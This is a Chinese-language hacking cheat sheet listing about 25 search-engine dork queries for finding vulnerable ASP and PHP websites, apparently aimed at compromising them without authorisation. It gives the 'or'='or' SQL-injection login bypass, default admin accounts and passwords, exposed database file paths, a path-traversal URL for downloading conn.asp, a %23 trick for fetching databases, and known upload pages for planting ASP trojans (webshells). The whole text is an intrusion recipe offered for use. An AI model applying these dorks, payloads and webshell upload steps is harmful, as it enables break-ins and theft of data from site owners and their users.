利用google搜索关键字入侵漏洞网站
1、到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL 数据库! 2、到Google ,site:cq inurl:asp 3、 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关 键词是went.asp 用'or'='or'来登陆 4、关键字:Co Net MIB Ver 1.0网站后台管理系统帐号密码为 'or'='or' 5、动感购物系统 inurl:help.asp
登陆,如未注册成为
会员! upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2 漏洞 6、默认数据库地址blogdata/acblog.asa 关键字:acblog 7、百度 /htdocs
注册里可以直接上传asa文件! 8、/Database/#newasp.mdb 关键词:New
Asp SiteManageSystem Version 9、用挖掘机 关键字:Powered by WEBBOY 页面:/upfile.asp 10. baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞) 11. Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower , 12. inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到 很多网站 13. 现在GOOGLE
搜索关键字 intitle:网站小助手 inurl:asp
14. 键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛挖掘鸡的关键字 添 setup.asp
15.
VBulletin论坛的数据库默认数据库地址! /includes/functions.php
工具: 1.网站猎手 下载地址:百度 Google! 2.Google 关键字: Powered by:
vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by:
vBulletin Version 3.0.3 其中一个就可以了
16. 1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping
cart open source。 这是一个商场系统。 2.网站的最底部分,有个 Comersus
Open Technologies LC。打开看下~~comersus系统~ 猜到,comersus.mdb. 是数据库名数据库都是放在database/ 后的, 所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。那样把前一个 ''store/''除去,再加上database/comersus.mdb 试试
17. 无忧传奇官方站点程序。 1、后台管理地址:您的域名/msmiradmin/ 2、默认后台管理帐号:msmir 3、默认后台管理密码:msmirmsmir
数据库文件为 您的域名/msmirdata/msmirArticle.mdb数据库连接文件为 ***********/Conn.asp
18. 百度里输入/skins/default/
19. 利用挖掘机关键机:power by Discuz 路径:/wish.php 配合: Discuz!论坛 wish.php远程包含漏洞 工具使用
20. 上传漏洞. 工具 : Domain3.5 网站猎手 1.5版关键字powered by
mypower 检测的页面或文件插入upfile_photo.asp
21. 新云漏洞这个漏洞ACCESS和SQL版通吃。 Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 -
网站地图 - 管理登录" 把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp 以源码,软件等下载站居多。大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了 \database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb
22. 通吃所有商城+动力上传系统使用工具:挖掘鸡 v1.1 明小子商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款 ->汇款确认->发货->完成漏洞页面:upload.asp
upfile_flash.asp 动力入侵: 关键字:powered by mypower 漏洞页面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp
upfile_softpic.asp
23、动易列目录 admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
24、工具:网站猎手关键词:inurl:Went.asp 后缀:manage/login.asp 口 令:'or'='or' 25、入侵魔兽私服需要的工具:ASP木马一只。 Domain3.5明小子关键字: All Right Reserved Design:游戏联盟后台地址:admin/login